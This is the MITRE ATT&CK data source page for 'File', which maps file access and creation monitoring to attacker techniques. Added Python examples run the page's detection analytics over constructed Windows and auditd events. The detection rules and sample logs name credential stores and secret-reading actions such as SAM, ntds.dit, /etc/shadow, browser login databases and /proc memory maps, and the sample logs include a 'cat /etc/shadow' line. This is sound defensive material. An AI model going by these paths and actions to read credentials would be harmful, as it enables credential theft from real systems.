File

A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).[1]

ID: DS0022
Platforms: Linux, Network, Windows, macOS
Collection Layer: Host
Contributors: Center for Threat-Informed Defense (CTID)
Version: 1.0
Created: 20 October 2021
Last Modified: 07 December 2022

Data Components

File: File Access

Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)

Domain ID Name Detects
Enterprise T1087 Account Discovery

Monitor access to file resources that contain local account and group information, such as /etc/passwd, /Users directories, and the SAM database.

If access requires high privileges, look for non-admin objects (such as users or processes) attempting to access restricted file resources.

.001 Local Account

Monitor access to file resources that contain local account and group information, such as /etc/passwd, /Users directories, and the Windows SAM database.

If access requires high privileges, look for non-admin objects (such as users or processes) attempting to access restricted file resources.

Enterprise T1119 Automated Collection

Monitor for unexpected files (e.g., .pdf, .docx, .jpg, etc.) viewed for collecting internal data.

ICS T0802 Automated Collection

Monitor for unexpected files (e.g., .pdf, .docx, .jpg) viewed for collecting internal data.

Enterprise T1020 Automated Exfiltration

Monitor for abnormal access to files (e.g., .pdf, .docx, .jpg), especially sensitive documents, through the use of automated processing after they have been gathered during Collection.

Enterprise T1217 Browser Information Discovery

Monitor for unusual access to stored browser data, such as local files and databases (e.g., %APPDATA%/Google/Chrome).[2] Rather than viewing these events in isolation, this activity may highlight a chain of behavior that could lead to other activities, such as Collection and Exfiltration.

Enterprise T1555 Credentials from Password Stores

Monitor for access to files in common password storage locations, which may indicate attempts to obtain user credentials.

.001 Keychain

Monitor for Keychain files being accessed that may be related to malicious credential collection.

.003 Credentials from Web Browsers

Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User Data\Default\Login Data. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser.

.004 Windows Credential Manager

Consider monitoring file reads to Vault locations, %Systemdrive%\Users\[Username]\AppData\Local\Microsoft\[Vault/Credentials]\, for suspicious activity.[3]

.005 Password Managers

Monitor file reads that may acquire user credentials from third-party password managers.[4]

Enterprise T1005 Data from Local System

Monitor for unexpected/abnormal access to files that may indicate malicious collection of local data, such as user files (.pdf, .docx, .jpg, etc.) or local databases.

ICS T0893 Data from Local System

Monitor for unexpected/abnormal access to files that may indicate malicious collection of local data, such as user files (e.g., .pdf, .docx, .jpg, .dwg) or local databases.

Enterprise T1039 Data from Network Shared Drive

Monitor for unexpected files (e.g., .pdf, .docx, .jpg) interacting with network shares.

Enterprise T1025 Data from Removable Media

Monitor for unexpected/abnormal file accesses to removable media (optical disk drive, USB memory, etc.) connected to the compromised system.

Enterprise T1074 Data Staged

Monitor for processes that appear to be reading files from disparate locations and writing them to the same directory or file; this may be an indication of data being staged, especially if the processes are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib.

.001 Local Data Staging

Monitor for processes that appear to be reading files from disparate locations and writing them to the same directory or file; this may be an indication of data being staged, especially if the processes are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib.

.002 Remote Data Staging

Monitor for processes that appear to be reading files from disparate locations and writing them to the same directory or file; this may be an indication of data being staged, especially if the processes are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib.

Enterprise T1114 Email Collection

Monitor for unusual processes accessing local system email files for Exfiltration, unusual processes connecting to an email server within a network, and unusual access patterns or authentication attempts on a public-facing webmail server; all of these may be indicators of malicious activity.

.001 Local Email Collection

Monitor for unusual processes accessing local email files that may target user email on local systems to collect sensitive information.

Enterprise T1048 Exfiltration Over Alternative Protocol

Monitor for suspicious files (e.g., .pdf, .docx, .jpg) viewed in isolation that may steal data by exfiltrating it over a different protocol than that of the existing command and control channel.

.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol

Monitor for files viewed in isolation that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.

.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Monitor for files viewed in isolation that may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel.

.003 Exfiltration Over Unencrypted Non-C2 Protocol

Monitor for files viewed in isolation that may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel.

Enterprise T1041 Exfiltration Over C2 Channel

Monitor for suspicious files (e.g., .pdf, .docx, .jpg) viewed in isolation that may steal data by exfiltrating it over an existing command and control channel.

Enterprise T1011 Exfiltration Over Other Network Medium

Monitor for files being accessed that could be related to exfiltration, such as file reads by a process that also has an active network connection.

.001 Exfiltration Over Bluetooth

Monitor for files being accessed that could be related to exfiltration, such as file reads by a process that also has an active network connection. Also monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.

Enterprise T1052 Exfiltration Over Physical Medium

Monitor file access on removable media that may attempt to exfiltrate data via a physical medium, such as a removable drive.

.001 Exfiltration over USB

Monitor file access on removable media that may attempt to exfiltrate data over a USB connected physical device.

Enterprise T1567 Exfiltration Over Web Service

Monitor for files being accessed by an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.

.001 Exfiltration to Code Repository

Monitor for files being accessed to exfiltrate data to a code repository rather than over their primary command and control channel.

.002 Exfiltration to Cloud Storage

Monitor for files being accessed to exfiltrate data to a cloud storage service rather than over their primary command and control channel.

.004 Exfiltration Over Webhook

Monitor for files being accessed to exfiltrate data to a webhook as a malicious command and control channel.

Enterprise T1187 Forced Authentication

Monitor for unexpected files used to gather credentials when the files are rendered.

Enterprise T1654 Log Enumeration

Monitor for access to system and service log files, especially from unexpected and abnormal users.

Enterprise T1003 OS Credential Dumping

Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts (T1078) in use by adversaries may help as well.

.002 Security Account Manager

Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well.

.003 NTDS

Monitor for access or copy of the NTDS.dit.

Note: Events 4656 and 4663 (Microsoft Windows Security Auditing) provide context of processes and users requesting access or accessing file objects (ObjectType = File) such as C:\Windows\NTDS\ntds.dit. It is important to note that, in order to generate these events, a System Access Control List (SACL) must be defined for the ntds.dit file. Access rights that allow read operations on file objects and their attributes are %%4416 Read file data, %%4419 Read extended file attributes, and %%4423 Read file attributes. If you search for just the name of the file and not the entire directory, you may also get access events related to a copy of ntds.dit within a snapshot or volume shadow copy.

Events 4656 and 4663 (Microsoft Windows Security Auditing) provide context of processes and users creating or copying file objects (ObjectType = File) such as C:\Windows\NTDS\ntds.dit. It is important to note that, in order to generate these events, a System Access Control List (SACL) must be defined for the ntds.dit file. In order to filter file creation events, filter on access rights %%4417 Write data to the file and %%4424 Write file attributes.

Event 11 (Microsoft Windows Sysmon) provides context of processes and users creating or copying files. Unfortunately, this event identifies the file being created or copied to, but not the source file it was copied from. A good starting point would be to look for new files created or copied with the extension .dit.

Analytic 1

suspicious_file = filter file_access where ((event_id = "4656" OR event_id = "4663") AND (object_type = "File") AND (file_name = "ntds.dit") AND (access_list = "%%4416" OR access_list = "%%4419" OR access_list = "%%4423"))

Analytic 2

suspicious_file = filter file_access where ((event_id = "4656" OR event_id = "4663") AND (object_type = "File") AND (file_name = "ntds.dit") AND (access_list = "%%4417" OR access_list = "%%4424"))

Analytic 3

suspicious_file = filter file_access where ((event_id = "11") AND (file_name = "*.dit"))
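The three analytics above applied to constructed event records, as an added example that is not ATT&CK's own code. Field names (ObjectType, ObjectName, AccessList, ProcessName, SubjectUserName for the Security events; Image and TargetFilename for Sysmon EID 11) follow the schemas the analytics assume; the Security records only exist on a real host if a SACL has been set on ntds.dit, as noted above, and the example also flags when a matching access points at a volume shadow copy rather than the live file.

```python
"""Added example: run the ntds.dit access/creation analytics over sample records."""
import re

# Access-right codes named on the page.
READ_RIGHTS = {"%%4416", "%%4419", "%%4423"}   # read data, read EA, read attributes
WRITE_RIGHTS = {"%%4417", "%%4424"}            # write data, write attributes

# Constructed sample events (not real telemetry). AccessList is the multi-line
# string Windows writes, one %%code per line, so it is parsed rather than compared.
SAMPLE_EVENTS = [
    {"EventID": 4663, "ObjectType": "File", "SubjectUserName": "svc_backup",
     "ProcessName": "C:\\Windows\\System32\\ntdsutil.exe",
     "ObjectName": "C:\\Windows\\NTDS\\ntds.dit",
     "AccessList": "%%4416\n\t\t\t\t%%4423"},
    {"EventID": 4656, "ObjectType": "File", "SubjectUserName": "jdoe",
     "ProcessName": "C:\\Windows\\System32\\cmd.exe",
     "ObjectName": "\\Device\\HarddiskVolumeShadowCopy3\\Windows\\NTDS\\ntds.dit",
     "AccessList": "%%4416"},
    {"EventID": 4663, "ObjectType": "File", "SubjectUserName": "jdoe",
     "ProcessName": "C:\\Windows\\System32\\cmd.exe",
     "ObjectName": "C:\\Temp\\ntds.dit",
     "AccessList": "%%4417\n\t\t\t\t%%4424"},
    {"EventID": 4663, "ObjectType": "Key", "SubjectUserName": "jdoe",      # not a file object
     "ProcessName": "C:\\Windows\\regedit.exe",
     "ObjectName": "\\REGISTRY\\MACHINE\\SOFTWARE\\ntds.dit", "AccessList": "%%4416"},
    {"EventID": 4663, "ObjectType": "File", "SubjectUserName": "SYSTEM",   # a different file
     "ProcessName": "C:\\Windows\\System32\\lsass.exe",
     "ObjectName": "C:\\Windows\\NTDS\\edb.log", "AccessList": "%%4416"},
    {"EventID": 11, "Image": "C:\\Windows\\System32\\cmd.exe",
     "TargetFilename": "C:\\Temp\\ntds.dit"},
    {"EventID": 11, "Image": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
     "TargetFilename": "C:\\Users\\jdoe\\Documents\\report.docx"},
]


def parse_access_list(text):
    """Return the set of %%NNNN codes in a 4656/4663 AccessList field."""
    return set(re.findall(r"%%\d+", text or ""))


def file_name(path):
    """Last path component, lower-cased, for both drive-letter and \\Device paths."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_shadow_copy_path(path):
    """True when the object lives in a VSS snapshot rather than on the live volume."""
    return "harddiskvolumeshadowcopy" in path.lower()


def run_analytics(events):
    """Apply Analytic 1 (reads), 2 (writes) and 3 (Sysmon creation) to each record."""
    hits = []
    for ev in events:
        eid = ev.get("EventID")
        if eid in (4656, 4663) and ev.get("ObjectType") == "File":
            path = ev.get("ObjectName", "")
            if file_name(path) != "ntds.dit":
                continue
            rights = parse_access_list(ev.get("AccessList"))
            for analytic, wanted in ((1, READ_RIGHTS), (2, WRITE_RIGHTS)):
                if rights & wanted:
                    hits.append({"analytic": analytic, "event_id": eid,
                                 "user": ev.get("SubjectUserName"),
                                 "process": ev.get("ProcessName"), "path": path,
                                 "rights": sorted(rights & wanted),
                                 "shadow_copy": is_shadow_copy_path(path)})
        elif eid == 11:
            path = ev.get("TargetFilename", "")
            if file_name(path).endswith(".dit"):
                hits.append({"analytic": 3, "event_id": eid, "user": None,
                             "process": ev.get("Image"), "path": path,
                             "rights": [], "shadow_copy": is_shadow_copy_path(path)})
    return hits


if __name__ == "__main__":
    for hit in run_analytics(SAMPLE_EVENTS):
        print(hit)
```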

.007 Proc Filesystem

Monitor for unexpected access to passwords and hashes stored in memory. To read them, a process must open the maps file of the process being analyzed in the /proc filesystem. This file is stored under the path /proc/<pid>/maps, where <pid> is the unique process ID of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.

.008 /etc/passwd and /etc/shadow

Monitor for files being accessed that may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access /etc/passwd and /etc/shadow, alerting on the pid, process name, and arguments of such programs.

Enterprise T1018 Remote System Discovery

Monitor for files (such as /etc/hosts) being accessed that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.

For Windows, Event ID 4663 (An Attempt Was Made to Access An Object) can be used to alert on access attempts of local files that store host data, including C:\Windows\System32\Drivers\etc\hosts.

For Linux, auditing frameworks such as the audit daemon (auditd) can be used to alert on access attempts of local files that store host data, including /etc/hosts.
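The auditd guidance above (for /etc/passwd, /etc/shadow, /proc/<pid>/maps and /etc/hosts) turned into reporting logic, as an added example that is neither ATT&CK's nor auditd's code. It assumes watch rules keyed etc_passwd, etc_shadow and etc_hosts and a syscall rule keyed proc_maps (all names chosen here), parses the multi-record events auditd writes, and reports the pid, process name and decoded arguments the page says to alert on; the sample log and the allowlist of expected readers are constructed.

```python
"""Added example: parse auditd events from file watch rules and build alerts."""
import re
from collections import defaultdict

# Keys assumed to be set by rules such as: -w /etc/shadow -p r -k etc_shadow
WATCH_KEYS = {"etc_passwd", "etc_shadow", "etc_hosts", "proc_maps"}
# Constructed allowlist: readers that are expected to touch a given path.
EXPECTED_READERS = {"etc_passwd": {"/usr/sbin/sshd", "/usr/bin/getent"}}

HEADER_RE = re.compile(r'^type=(\w+) msg=audit\(([\d.]+):(\d+)\): (.*)$')
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def proctitle_hex(*argv):
    """Encode argv the way auditd does when the proctitle contains NULs (hex)."""
    return b"\0".join(a.encode() for a in argv).hex().upper()


# Constructed audit.log (not a real capture). Records of one event share a serial.
SAMPLE_LOG = "\n".join([
    'type=SYSCALL msg=audit(1700000000.101:4567): arch=c000003e syscall=257 success=yes '
    'exit=3 ppid=2100 pid=2155 auid=1000 uid=1000 euid=1000 comm="cat" exe="/usr/bin/cat" '
    'key="etc_shadow"',
    'type=CWD msg=audit(1700000000.101:4567): cwd="/home/jdoe"',
    'type=PATH msg=audit(1700000000.101:4567): item=0 name="/etc/" inode=2 nametype=PARENT',
    'type=PATH msg=audit(1700000000.101:4567): item=1 name="/etc/shadow" inode=1311 nametype=NORMAL',
    'type=PROCTITLE msg=audit(1700000000.101:4567): proctitle=' + proctitle_hex("cat", "/etc/shadow"),
    # An expected reader of /etc/passwd: suppressed by the allowlist.
    'type=SYSCALL msg=audit(1700000000.250:4570): arch=c000003e syscall=257 success=yes '
    'exit=4 ppid=1 pid=2180 auid=4294967295 uid=0 euid=0 comm="sshd" exe="/usr/sbin/sshd" '
    'key="etc_passwd"',
    'type=PATH msg=audit(1700000000.250:4570): item=1 name="/etc/passwd" inode=1300 nametype=NORMAL',
    'type=PROCTITLE msg=audit(1700000000.250:4570): proctitle="sshd: jdoe [priv]"',
    # A script reading another process's memory map.
    'type=SYSCALL msg=audit(1700000000.400:4580): arch=c000003e syscall=257 success=yes '
    'exit=3 ppid=2155 pid=2201 auid=1000 uid=1000 euid=1000 comm="python3" '
    'exe="/usr/bin/python3" key="proc_maps"',
    'type=PATH msg=audit(1700000000.400:4580): item=0 name="/proc/2155/maps" inode=9 nametype=NORMAL',
    'type=PROCTITLE msg=audit(1700000000.400:4580): proctitle='
    + proctitle_hex("python3", "dump.py", "--pid", "2155"),
    # An unkeyed event: ignored.
    'type=SYSCALL msg=audit(1700000000.500:4590): arch=c000003e syscall=59 success=yes '
    'exit=0 ppid=2100 pid=2300 auid=1000 uid=1000 euid=1000 comm="ls" exe="/usr/bin/ls" key=(null)',
    'type=PROCTITLE msg=audit(1700000000.500:4590): proctitle="ls"',
])


def unquote(value):
    return value[1:-1] if len(value) >= 2 and value.startswith('"') else value


def decode_proctitle(raw):
    """Quoted proctitle is a single string; unquoted is hex with NUL separators."""
    if raw.startswith('"'):
        return [unquote(raw)]
    return [a.decode(errors="replace") for a in bytes.fromhex(raw).split(b"\0") if a]


def parse_records(text):
    """Group records by audit serial: {serial: [(record_type, raw_fields), ...]}."""
    events = defaultdict(list)
    for line in text.splitlines():
        m = HEADER_RE.match(line.strip())
        if not m:
            continue
        rtype, _ts, serial, body = m.groups()
        events[int(serial)].append((rtype, dict(KV_RE.findall(body))))
    return events


def file_access_alerts(text):
    """One alert per keyed event whose reader is not on the allowlist for that key."""
    alerts = []
    for serial, records in sorted(parse_records(text).items()):
        syscall = next((f for t, f in records if t == "SYSCALL"), None)
        if syscall is None:
            continue
        key = unquote(syscall.get("key", "(null)"))
        if key not in WATCH_KEYS:
            continue
        exe = unquote(syscall.get("exe", ""))
        if exe in EXPECTED_READERS.get(key, ()):
            continue
        paths = [unquote(f["name"]) for t, f in records
                 if t == "PATH" and f.get("nametype") == "NORMAL"]
        title = next((f.get("proctitle", '""') for t, f in records if t == "PROCTITLE"), '""')
        alerts.append({"serial": serial, "key": key, "pid": int(syscall["pid"]),
                       "uid": int(syscall["uid"]), "comm": unquote(syscall["comm"]),
                       "exe": exe, "paths": paths, "argv": decode_proctitle(title)})
    return alerts


if __name__ == "__main__":
    for alert in file_access_alerts(SAMPLE_LOG):
        print(alert)
```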

ICS T0846 Remote System Discovery

Monitor for files (such as /etc/hosts) being accessed that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.

ICS T0888 Remote System Information Discovery

Monitor for files (such as /etc/hosts) being accessed that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.

Enterprise T1091 Replication Through Removable Media

Monitor for unexpected files accessed on removable media.

ICS T0847 Replication Through Removable Media

Monitor for files accessed on removable media, particularly those with executable content.

Enterprise T1649 Steal or Forge Authentication Certificates

Monitor for attempts to access files that store information about certificates and their associated private keys. For example, personal certificates for users may be stored on disk in folders such as %APPDATA%\Microsoft\SystemCertificates\My\Certificates\.[5][6]

Enterprise T1558 Steal or Forge Kerberos Tickets

Monitor for unexpected processes interacting with lsass.exe.[7] Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored. Monitor for unusual processes accessing secrets.ldb and .secrets.mkey located in /var/lib/sss/secrets/.

Enterprise T1539 Steal Web Session Cookie

Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials to cloud service management consoles. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.

Enterprise T1033 System Owner/User Discovery

Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well.

Enterprise T1552 Unsecured Credentials

Monitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior. Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like cat ~/.bash_history.

.001 Credentials In Files

Monitor for files being accessed that may search local file systems and remote file shares for files containing insecurely stored credentials. While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained.

.003 Bash History

Monitoring when the user's .bash_history is read can help alert to suspicious activity.

.004 Private Keys

Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity.

.006 Group Policy Preferences

Monitor for attempts to access SYSVOL that involve searching for XML files.

ICS T0863 User Execution

Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning PowerShell).

File: File Creation

Initial construction of a new file (ex: Sysmon EID 11)

Domain ID Name Detects
Enterprise T1560 Archive Collected Data

Monitor newly constructed files being written with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.

.001 Archive via Utility

Monitor newly constructed files being written with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.

.002 Archive via Library

Monitor newly constructed files being written with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.

.003 Archive via Custom Method

Monitor newly constructed files being written with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.

Enterprise T1547 Boot or Logon Autostart Execution

Monitor for newly constructed files that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.

.006 Kernel Modules and Extensions

Monitor for newly constructed files that may modify the kernel to automatically execute programs on system boot.

.008 LSASS Driver

Monitor newly constructed files that may modify or add LSASS drivers to obtain persistence on compromised systems.

.009 Shortcut Modification

Monitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.[8] Analysis should attempt to relate shortcut creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.

.010 Port Monitors

Monitor newly constructed files that may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.

.012 Print Processors

Monitor for newly constructed files that may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.

.013 XDG Autostart Entries

Malicious XDG autostart entries may be detected by auditing file creation events within the /etc/xdg/autostart and ~/.config/autostart directories. Depending on individual configurations, defenders may need to query the environment variables $XDG_CONFIG_HOME or $XDG_CONFIG_DIRS to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.

.015 Login Items

All login items created via shared file lists are viewable by using the System Preferences GUI or in the ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm file.[9][10][11][12] These locations should be monitored and audited.

Enterprise T1037 Boot or Logon Initialization Scripts

Monitor for newly constructed files that may use scripts automatically executed at boot or logon initialization to establish persistence.

.002 Login Hook

Monitor for the creation of and/or changes to login hook files (/Library/Preferences/com.apple.loginwindow.plist), especially by unusual accounts outside of normal administration duties.

.003 Network Logon Script

Monitor for newly constructed files by unusual accounts outside of normal administration duties.

.004 RC Scripts

Monitor for a newly constructed /etc/rc.local file.

.005 Startup Items

Monitor for newly constructed files by unusual accounts outside of normal administration duties.

Enterprise T1176 Browser Extensions

Monitor for newly constructed files. On macOS, all installed extensions maintain a plist file in the /Library/Managed Preferences/username/ directory; ensure all listed files are in alignment with approved extensions.

Enterprise T1554 Compromise Client Software Binary

Monitor for newly constructed files that may modify client software binaries to establish persistent access to systems.

Enterprise T1659 Content Injection

Monitor for unexpected and abnormal file creations that may indicate malicious content injected through online network communications.

Enterprise T1543 Create or Modify System Process

Monitor for newly constructed files that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence.

.001 Launch Agent

Monitor for newly constructed files that may create or modify launch agents to repeatedly execute malicious payloads as part of persistence.

.002 Systemd Service

Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links

.004 Launch Daemon

Monitor for new files added to the /Library/LaunchDaemons/ folder. The System LaunchDaemons are protected by SIP.

Enterprise T1486 Data Encrypted for Impact

Monitor for newly constructed files in user directories.

Enterprise T1565 Data Manipulation

Monitor for newly constructed files that may be used to manipulate external outcomes or hide activity.

.001 Stored Data Manipulation

Monitor for newly constructed files that may be used to manipulate external outcomes or hide activity.

.003 Runtime Data Manipulation

Monitor for newly constructed files that may be used to manipulate external outcomes or hide activity.

Enterprise T1074 Data Staged

Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.

.001 Local Data Staging

Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.

.002 Remote Data Staging

Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.

Enterprise T1491 Defacement

Monitor for newly constructed visual content for internal or external enterprise networks.

.001 Internal Defacement

Monitor for newly constructed files that may deface systems internal to an organization in an attempt to intimidate or mislead users.

.002 External Defacement

Monitor for newly constructed files that may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users.

Enterprise T1006 Direct Volume Access

Monitor for the creation of volume shadow copy and backup files, especially unexpected and irregular activity (relative to time, user, etc.).

Enterprise T1189 Drive-by Compromise

Monitor for newly constructed files written to disk to gain access to a system through a user visiting a website over the normal course of browsing.

ICS T0817 Drive-by Compromise

Monitor for newly constructed files written to disk through a user visiting a website over the normal course of browsing.

Enterprise T1546 Event Triggered Execution

Monitor newly constructed files that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.

.002 Screensaver

Monitor newly constructed files that may establish persistence by executing malicious content triggered by user inactivity.

Analytic 1 - Files created on disk that are being used as screensaver files

screensaver_key_modification = filter ProcessGuid, ProcessFilePath, UserName, RegistryKeyPath, RegistryKeyValueData where event_id == "13" AND RegistryKeyPath LIKE '%Software\Policies\Microsoft\Windows\Control Panel\Desktop\SCRNSAVE.EXE%'

new_files = filter ProcessFilePath, UserName, FileName where event_id == "11"

suspicious_files = filter k.ProcessGuid, k.ProcessFilePath, k.UserName, k.RegistryKeyPath, k.RegistryKeyValueData FROM screensaver_key_modification k INNER JOIN new_files f ON k.RegistryKeyValueData = f.FileName
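The join in Analytic 1 above over constructed Sysmon records, as an added example that is not ATT&CK's own code. It uses Sysmon's field names (TargetObject and Details for EID 13, TargetFilename and Image for EID 11) in place of the analytic's generic ones, matches the registry value data against created file paths case-insensitively, and also reports which process created the screensaver file, which the analytic's projection of k.* columns alone does not show.

```python
"""Added example: Sysmon EID 13 (SCRNSAVE.EXE set) joined with EID 11 (file created)."""

# The analytic on the page matches the policy key; the same value name also exists
# under HKCU\Control Panel\Desktop, which a production rule would add to this suffix list.
SCRNSAVE_KEY_SUFFIX = "\\software\\policies\\microsoft\\windows\\control panel\\desktop\\scrnsave.exe"

# Constructed Sysmon-style records (not real telemetry); GUIDs are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 11, "ProcessGuid": "{CONSTRUCTED-GUID-0002}", "User": "LAB\\jdoe",
     "Image": "C:\\Users\\jdoe\\Downloads\\setup.exe",
     "TargetFilename": "C:\\Users\\jdoe\\AppData\\Roaming\\updater.scr"},
    {"EventID": 13, "ProcessGuid": "{CONSTRUCTED-GUID-0001}", "User": "LAB\\jdoe",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Policies\\Microsoft"
                     "\\Windows\\Control Panel\\Desktop\\SCRNSAVE.EXE",
     "Details": "C:\\Users\\jdoe\\AppData\\Roaming\\UPDATER.SCR"},
    {"EventID": 13, "ProcessGuid": "{CONSTRUCTED-GUID-0001}", "User": "LAB\\jdoe",   # other value
     "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Policies\\Microsoft"
                     "\\Windows\\Control Panel\\Desktop\\ScreenSaveTimeOut",
     "Details": "DWORD (0x00000258)"},
    {"EventID": 13, "ProcessGuid": "{CONSTRUCTED-GUID-0003}", "User": "LAB\\admin",  # built-in
     "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1002\\Software\\Policies\\Microsoft"
                     "\\Windows\\Control Panel\\Desktop\\SCRNSAVE.EXE",
     "Details": "C:\\Windows\\System32\\Bubbles.scr"},
    {"EventID": 11, "ProcessGuid": "{CONSTRUCTED-GUID-0004}", "User": "LAB\\jdoe",
     "Image": "C:\\Windows\\System32\\notepad.exe",
     "TargetFilename": "C:\\Users\\jdoe\\Downloads\\notes.txt"},
]


def normalize_path(path):
    """Case-insensitive comparison key for Windows paths as Sysmon records them."""
    return path.strip().strip('"').lower()


def screensaver_key_modifications(events):
    """EID 13 records that set the SCRNSAVE.EXE value under the policy key."""
    return [e for e in events if e.get("EventID") == 13
            and normalize_path(e.get("TargetObject", "")).endswith(SCRNSAVE_KEY_SUFFIX)]


def new_files(events):
    """EID 11 records: every file creation Sysmon logged."""
    return [e for e in events if e.get("EventID") == 11]


def suspicious_screensavers(events):
    """Inner join: registry value data (the .scr path) equals a created file's path."""
    created = {}
    for f in new_files(events):
        created.setdefault(normalize_path(f["TargetFilename"]), f)
    hits = []
    for k in screensaver_key_modifications(events):
        f = created.get(normalize_path(k.get("Details", "")))
        if f is None:
            continue   # value points at a file no creation event was seen for
        hits.append({"registry_process": k["Image"], "registry_user": k["User"],
                     "registry_guid": k["ProcessGuid"], "key": k["TargetObject"],
                     "screensaver": k["Details"],
                     "file_creator": f["Image"], "file_creator_guid": f["ProcessGuid"]})
    return hits


if __name__ == "__main__":
    for hit in suspicious_screensavers(SAMPLE_EVENTS):
        print(hit)
```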

.004 Unix Shell Configuration Modification

Monitor for newly constructed files that may establish persistence through executing malicious commands triggered by a user’s shell. For most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the /etc/shells file.

.005 Trap

Monitor for newly constructed files that may establish persistence by executing malicious content triggered by an interrupt signal.

.008 Accessibility Features

Monitor newly constructed files that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features.

.013 PowerShell Profile

Locations where profile.ps1 can be stored should be monitored for new profiles.[13] Example profile locations include:

* $PsHome\Profile.ps1
* $PsHome\Microsoft.{HostProgram}_profile.ps1
* $Home\My Documents\PowerShell\Profile.ps1
